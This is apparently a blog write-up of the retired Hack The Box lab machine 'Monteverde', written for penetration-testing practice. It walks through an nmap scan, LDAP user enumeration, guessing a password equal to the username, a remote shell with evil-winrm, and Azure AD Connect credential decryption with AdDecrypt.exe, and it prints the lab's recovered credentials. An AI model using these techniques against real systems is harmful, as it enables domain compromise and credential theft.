Monteverde

Jun 14, 2020 · 2 min read

With one of the first machines I have done on hack the box retiring I can finally start to publish some of the writeups I have done for these pen-testing labs.

Foot Hold

As always the first step for any box is to see what is available to access:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 15:25 AEST
Nmap scan report for monteverde.htb (10.10.10.172)
Host is up (0.29s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 15.25 seconds

the nmap scan shows LDAP open to the world, naughty boys, and worse an unauthenticated search lets us enumerate the users revealing a list of usernames

Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
smorgan
some quick testing against the SMB port reveals that a lasy administrator has set the SABatchJobs password giving us a set of valid credentials.

SABatchJobs:SABatchJobs with these, we can start to read the shares

User

in the user share from hope we find an azure.xml with a password in it, this gives us the password for the mhope account

mhope:4n0therD4y@n0th3r$ not much else to be found on the shares, but we can use these creds with evil-winrm to get a remote shell, now we are talking and have user!

Root

with the user flag obtained we go back to enumerating the host to see what we can use for privesc one of the first options is to check out group membership, this shows mhope is a member of the Azure Admins group, and we can see we have the AzureAdConnect service running and some searching later we find this can be used for privesc. using the exploit at https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/ we get a result

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> c:/temp/AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

with these credentials we can log in and collect the root flag for an owned box!

hack-the-box